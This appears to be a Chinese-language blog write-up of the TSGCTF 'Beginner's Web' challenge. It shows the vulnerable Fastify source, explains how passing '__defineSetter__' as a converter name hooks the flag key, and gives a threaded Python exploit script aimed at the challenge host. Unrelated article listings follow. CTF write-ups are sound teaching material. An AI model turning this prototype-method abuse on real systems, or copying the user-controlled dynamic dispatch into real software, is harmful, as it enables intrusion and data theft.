const fastify = require('fastify');

 const nunjucks = require('nunjucks');

 const crypto = require('crypto');

 const converters = {};

 const flagConverter = (input, callback) => {

   const flag = '*** CENSORED ***';

   callback(null, flag);

 };

 const base64Converter = (input, callback) => {

   try {

     const result = Buffer.from(input).toString('base64');

     callback(null, result)

   } catch (error) {

     callback(error);

   }

 };

 const scryptConverter = (input, callback) => {

   crypto.scrypt(input, 'I like sugar', 64, (error, key) => {

     if (error) {

       callback(error);

     } else {

       callback(null, key.toString('hex'));

     }

   });

 };

 const app = fastify();

 app.register(require('point-of-view'), {engine: {nunjucks}});

 app.register(require('fastify-formbody'));

 app.register(require('fastify-cookie'));

 app.register(require('fastify-session'), {secret: Math.random().toString(2), cookie: {secure: false}});

 app.get('/', async (request, reply) => {

   reply.view('index.html', {sessionId: request.session.sessionId});

 });

 app.post('/', async (request, reply) => {

   if (request.body.converter.match(/[FLAG]/)) {

     throw new Error("Don't be evil :)");

   }

   if (request.body.input.length < 10) {

     throw new Error('Too short :(');

   }

   converters['base64'] = base64Converter;

   converters['scrypt'] = scryptConverter;

   converters[`FLAG_${request.session.sessionId}`] = flagConverter;

   const result = await new Promise((resolve, reject) => {

     converters[request.body.converter](request.body.input, (error, result) => {

       if (error) {

         reject(error);

       } else {

         resolve(result);

       }

     });

   });

   reply.view('index.html', {

     input: request.body.input,

     result,

     sessionId: request.session.sessionId,

   });

 });

 app.setErrorHandler((error, request, reply) => {

   reply.view('index.html', {error, sessionId: request.session.sessionId});

 });

 app.listen(59101, '0.0.0.0');

页面下方有显示出用户sessionID,结合源码不难看出可以利用flagConverter获得flag。因为有匹配,所以直接在converter参数传入FLAG_${request.session.sessionId}是行不通的。

1.利用__defineSetter__创造出名为FLAG_${request.session.sessionId}的数组键名 (${request.session.sessionId}表示sessionID)。

__defineSetter__介绍:https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Object/__defineSetter__

__defineSetter__有两个参数,第一个是属性,第二个是函数。实际上就是绑个函数在指定属性上,当指定属性被赋值时,该函数会被调用。

converters[request.body.converter](request.body.input, (error, result)是用户可控的,(error, result)是箭头函数有两个参数


所以,input输入FLAG_${request.session.sessionId},converter参数输入__defineSetter__就可以成功把(error, result)绑在FLAG_${request.session.sessionId}上。FLAG_${request.session.sessionId}对应箭头函数的第一个参数error,最后能通过error把flag输出


此时,我们需要对promise有所了解    https://blog.csdn.net/new__person/article/details/103702562




因为 __defineSetter__没有被触发,promise不会有返回结果,所以http没有response




此时应该是这样的__defineSetter(FLAG_${request.session.sessionId},(error, result) => {if (error) {reject(error);} else {resolve(result);})


我们直接回到post




红色箭头所指的是一个赋值操作,只要执行这条语句就能触发我们之前的__defineSetter__。非常的amazing啊,我们只要再发一个不会在前两个if判断挂掉的包就能成功触发。触发之后就会把FLAG_${request.session.sessionId}传入箭头函数,作为其第一个参数error,通过reject(error)输出。这里使用python发包


exp:




#!/usr/bin/python3

import threading

import requests

import time

cookie = {"sessionId" : "Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY.ZyckOkEpT1GboSRLgcE1I%2BZ52%2FqfSQEZWkq1%2F5dyJB"}

def sendPayload():

    r = requests.post("http://35.221.81.216:59101",data={"converter":"__defineSetter__","input":"FLAG_Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY"},cookies=cookie)

    print(r.text)

threading.Thread(target=sendPayload).start()

requests.post("http://35.221.81.216:59101",data={"converter":"base64","input":"55555555555555555555"},cookies=cookie)




这题叫beginner可真是太艹了
本人js菜的抠脚,如果有不对的地方,望各位师傅斧正
												


											
TSGCTF-web  Beginner's Web (js内置方法__defineSetter__)的更多相关文章
	

    
								
  1. web前端学习(四)JavaScript学习笔记部分(6)-- js内置对象
		
    1.JS内置对象-什么是对象 1.1.什么是对象: JavaScript中的所有事物都是对象:字符串.数值.数组.函数 每个对象带有属性和方法 JavaScript允许自定义对象 1.2.自定义对象: ...
    
		
    2. 
						
  2. 4、js内置函数
		
    前言:上一篇我介绍了函数的基本概念,和一些简单的Demo.其实很多函数是js内置的,我们无需自己去写,直接拿过来用即可.内置函数分为全局函数和js内置对象的函数区别:全局函数不属于任何一个内置对象.理 ...
    
		
    3. 
						
  3. 4月5日--课堂笔记--JS内置对象
		
    JavaScript 4.5 一.    JS内置对象 1.数组Array a)创建语法1:var arr=new Array(参数); i.       没有参数:创建一个初始容量为0的数组 ii. ...
    
		
    4. 
						
  4. JS内置对象有哪些?
		
    JS内置对象分为数据封装类对象和其他对象 数据封装类对象:String,Boolean,Number,Array,和Object; 其他对象:Function,Arguments,Math,Date, ...
    
		
    5. 
						
  5. JS内置对象-String对象、Date日期对象、Array数组对象、Math对象
		
    一.JavaScript中的所有事物都是对象:字符串.数组.数值.函数... 1.每个对象带有属性和方法 JavaScript允许自定义对象 2.自定义对象 a.定义并创建对象实例 b.使用函数来定义 ...
    
		
    6. 
						
  6. js  内置对象和方法  示例
		
    JS内置函数不从属于任何对象,在JS语句的任何地方都可以直接使用这些函数.JS中常用的内置函数如下: 1.eval(str)接收一个字符串形式的表达式,并试图求出表达式的值.作为参数的表达式可以采用任 ...
    
		
    7. 
						
  7. 【ES6】改变 JS 内置行为的代理与反射
		
    代理(Proxy)可以拦截并改变 JS 引擎的底层操作,如数据读取.属性定义.函数构造等一系列操作.ES6 通过对这些底层内置对象的代理陷阱和反射函数,让开发者能进一步接近 JS 引擎的能力. 一.代 ...
    
		
    8. 
						
  8. 5月15日上课笔记-js中 location对象的属性、document对象、js内置对象、Date事件对象、
		
    location的属性: host: 返回当前主机名和端口号 定时函数: setTimeout( ) setInterval() 二.document对象 getElementById(); 根据ID ...
    
		
    9. 
						
  9. JS内置对象的原型不能重定义?只能动态添加属性或方法?
		
    昨天马上就快下班了,坐在我对面的同事突然问我一个问题,我说“爱过”,哈哈,开个玩笑.情况是这样的,他发现JS的内置对象的原型好像不能通过字面量对象的形式进行覆盖, 只能动态的为内置对象的原型添加属性或 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 解决start.spring.io无法访问的情况
			
    将start.spring.io替换成下列网址 http://start.jetbrains.org.cn/ 或者----> 连接手机热点 因为绝大多数无法访问都是因为网络问题
    
			
    2. 
						
  2. java命令行输入参数
			
    Java命令行输入参数 代码用例:命令行输入参数,并进行加法运算. public class Demo01 { public static void main(String[] args) { for ...
    
			
    3. 
						
  3. 用Creator实现一个擀面的效果
			
    先上几张效果图 怎么实现的呢? 节点介绍 1是背景图,可以忽略:2 是准备好的面团:3 是擀好的面饼先隐藏:4 是需要绘制的节点:5 是擀面杖. 制作开始 首先在view上挂一个mask,并且设置为模 ...
    
			
    4. 
						
  4. 前端笔记(关于webpack打包时内存溢出问题的解决)
			
    首先安装increase-memory-limit cnpm install -g increase-memory-limit 重启cmd,并在项目跟目录中运行一下 increase-memory-l ...
    
			
    5. 
						
  5. 通俗易懂的阿里Sentinel源码分析:如何向控制台发送心跳包?
			
    源码分析 public class Env { public static final Sph sph = new CtSph(); static { // 在Env类的静态代码块中, // 触发了一 ...
    
			
    6. 
						
  6. java面试题——对于多态你是怎么理解的呢?不一样的角度,带你重新看java
			
    java面试的时候经常会被问到一个问题,那就是java三大特性:继承,封装和多态.那么这三者的含义究竟是什么你真的清楚吗?我看网上大多都是人云亦云.所以我想把我的想法记录下来供大家参考-今天先聊一个, ...
    
			
    7. 
						
  7. springsecurity简单学习
			
    一.初识SpringSecurity 在springboot项目中加入spring security. 1.在pom.xml中加入依赖 <dependency> <groupId&g ...
    
			
    8. 
						
  8. django中的懒加载机制
			
    懒加载在前端中的意义: 懒加载的主要目的就是作为服务器前端的优化,减少请求次数或者延迟请求数. 实现原理: 先加载一部分数据,当触发某个条件时利用异步加载剩余的数据,新得到的数据不会影响原有数据的显示 ...
    
			
    9. 
						
  9. postman做自动化测试1——collection runner
			
    一.添加collection 打开postman,点击“collection”页签,点击collection下面的添加按钮. 弹出 新建面板,输入名称和描述,点击“creat”按钮,新建成功 3 点击 ...
    
			
    10. 
						
  10. Dynamics CRM Performance Issue when CRM Forms Opening
			
    事情发生在Dynamics CRM 8.2.2版本,客户新升级到这个版本几个月的时间. 突然有一天,客户反映为什么我们打开CRM Form页面的时候loading的时间这么长呢?大概会需要5-15分钟 ...
    
			
    11.